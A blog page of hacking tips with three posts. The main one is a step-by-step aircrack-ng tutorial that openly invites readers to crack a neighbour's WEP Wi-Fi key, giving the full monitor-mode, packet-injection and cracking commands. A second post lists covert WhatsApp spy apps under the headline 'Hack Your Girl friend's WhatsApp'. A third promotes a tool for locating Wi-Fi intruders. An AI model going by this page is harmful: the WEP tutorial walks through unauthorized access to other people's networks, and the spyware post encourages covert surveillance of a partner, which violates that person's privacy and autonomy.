Ethical hacking ebooks| tips and tricks| windows tricks| software| mobile| infotechno| free download with full version| games| ipad and; iphone|Android| google | java | c language | mobile | facebook | whatsapp | Earn money


Wanna hack Your neighbor's Wifi WEP key ?? [100%]

5/29/2014

Now-a-days your neighbor has wifi connection and if you have limited downloading plan or you don't have wifi at your home then you can hack wifi of your neighbor and the vice versa 
 i.e if you have wifi you may save your wifi being hacked. 

if You want to do the same this post is for you   :-.

Security Issues With WEP


WEP (Wired Equivalent Privacy) was proved full of flaws back in 2001, WEP protocol itself has some weakness which allows the attackers to crack them in no time. The biggest flaw probably in a WEP key is that it supports only 40bit encryption which means that there are 16million possibilities only.

For more information on WEP flaws, kindly read the WEP flaws section here.

Requirements :-


Here is what you would require to crack a WEP key:

1. Backtrack or any other Linux distro with aircrack-ng installed 

2. Wifi adapter capable of injecting packets , For this tutorial I will use Alfa AWUS036H which is a very popular card and it performs well with Backtrack

You can find compatible wifi card lists here.

Procedure :-


First Login to your Backtrack / Linux distro and plug in your Wifi adpter , Open a new konsole and type in the following commands 

ifconfig wlan0 up



where wlan0 is the name of the wireless card ,it can be different .To see all wireless cards connected to your system simply type in " iwconfig ".


Putting your WiFi Adapter on Monitor Mode

To begin, you’ll need to first put your wireless adapter into monitor mode , Monitor mode is the mode whereby your card can listen to every packet in the air , You can put your card into monitor mode by typing in the following commands 

airmon-ng start (your interface)

Example :- airmon-ng start wlan0



Now a new interface mon0 will be created , You can see the new interface is in monitor mode by entering "iwconfig mon0" as shown



Finding a suitable Target

After putting your card into monitor mode ,we need to find a network that is protected by WEP. You can discover the surrounding networks by entering the following command

airodump-ng mon0



Bssid shows the mac address of the AP, CH shows the channel in which AP is broadcasted and Essid shows the name broadcasted by the AP, Cipher shows the encryption type.

Now look out for a wep protected network In my case i’ll take “linksys “ as my target for rest of the tutorial

Attacking The Target

Now to crack the WEP key you'll have to capture the targets data into a file, To do this we use airodump tool again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels .You can restrict the capture by giving in the following commands

airodump-ng mon0 --bssid -c (channel ) -w (file name to save )



As my target is broadcasted in channel 6 and has a bssid "98:fc:11:c9:14:22" ,I give in the following commands and save the captured data as "RHAWEP"

airodump-ng mon0 --bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP


Using Aireplay to Speed up the cracking

Now you’ll have to capture at least 20,000 data packets to crack WEP .This can be done in two ways, The first one would be a (passive attack ) wait for a client to connect to the AP and then start capturing the data packets but this method is very slow, it can take days or even weeks to capture that many data packets

The second method would be an (active attack )this method is fast and only takes minutes to generate and inject that many packets .

In an active attack you'll have do a Fake authentication (connect) with the AP ,then you'll have to generate and inject packets. This can be done very easily by entering the following commands 

aireplay-ng - 1 3 -a (bssid of the target ) (interface) 



In my case i enter the following commands 

aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0 


After doing a fake authentication ,now its time to generate and inject Arp packets . To this you'll have to open a new Konsole simultaneously and type in the following commands

aireplay-ng 3 -b (bssid of target) -h ( Mac address of mon0) (interface)



In my case i enter
aireplay-ng 3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0

If this step was successful you'll see Lot of data packets in the airodump capture as shown



Wait till it reaches 20000 packets , best would be to wait till it reaches around 80,000 to 90,000 packets .Its simple more the packets less the time to crack .Once you’ve captured enough number of packets, close all the process's by clicking the into mark which is there on the terminal


Cracking WEP key using Aircrack


Now its time crack the WEP key from the captured data, Enter the following commands in a new konsole to crack the WEP key

aircrack-ng (name of the file )

In my case i enter 
aircrack-ng RHAWEP-0.1-cap

With in a few minutes Aircrak will crack the WEP key as shown



Once the crack is successful you will be left with the KEY! Remove the colons from the output and you’ll have your WEP Key.



Hack Your Girl friend's WhatApp by 6 best spy Apps

5/27/2014


infototechno

The usages of spy programs are in great demand nowadays. Kids and teenagers are so much acquainted with the web that it becomes a matter of stress for parents. Especially, in case of text messaging and IM’s parents are unable to trace out what their kids are texting about or is it safe or not. And today the volume of texting has increased due to the introduction of popular free messaging apps like WhatsApp, WeChat, Line, etc., that has become a trend for the younger generation. But do you know there are several spy programs that allow you to access your kids’ texts and messages? The presence of spy software lets you keep a track on WhatsApp messages, specifically developed for this app. With such apps you can go through the text messages on WhatsApp and stay aware of your kids’ activities.


How to Use WhatsApp Spy Programs?
  • Download/Buy the software.
  • Install it on your smartphone (as per the available downloads).
  • Follow the installation rules from the control panel.
  • Start tracking.

Top WhatsApp Spywares



whatsapp spy softwares


1. iMobispy

(Available for Android, iOS, Blackberry, Windows Phone and Symbian devices.)

2. StealthGenie
(Available for Android, iOS and Blackberry devices.)

3. OwnSpy
(Available for Android and iOS devices.)

4. MobileSpy
(Available for Android, iOS, Blackberry, Windows Phone and Symbian devices.)

5. Mspy
(Available for Android, iOS, Blackberry, Windows Phone and Symbian devices.)

6. FlexiSpy
(Available for Android, iOS, Blackberry and Symbian devices.)

How to Track wi-fi Hackers?

5/27/2014

Got a Wi-Fi net connection ? And do you think it is secure enough ? With the onset of cyber crimes taking place,your Wi-fi may be used illegally by hackers or some other people.Either you may get high internet bills in reward or you may be on headlines as your net may be compromised to send malicious emails to anyone,that's what happened in India sometime ago in Mumbai Bomb blast case. Well,there comes MoocherHunter™ to rescue.

MoocherHunter™ is a mobile tracking software tool for the real-time on-the-fly geo-location of wireless moochers and hackers. If you have ever wondered about the possibility of your wireless network getting used for illegal purposes, you must consider using Moocher Hunter. Using Moocher Hunter you can identify the location of the person i.e. an unauthorized user using your wireless network. Its then upto you to either give him a stern warning of not using your wireless network again or complaining to the legal authorities.
Recently Indian Police and RAW (Research and Analysis Wing) used Moocher Hunter to track the source of email which was sent from an unsecured Wi-Fi network from the home of an American expatriate,whose Network was compromised as someone wardived to use his net connection and send an email that took responsibility for a bomb blast that killed at least 42 people.

MoocherHunter is FREE to use and can easily predict the physical location of the computer using the WiFi connection.




The algorithms applied use various signal variables to accurately predict the position of the connected laptop/machine and allows to identify the location of an 802.11-based wireless moocher or hacker by the traffic they send across the network.MoocherHunter™ allows to pinpoint the location of a WIFI hacker upto an accuracy of 2 meters within an average of 30 minutes. 
Moocherhunter is the ultimate Wifi hacker tracker tool and its a must for every Network security specialist,White hats,Black hats,Green and Grey hats out there.

Track Wi-Fi Hackers Using MoocherHunter™ - download it now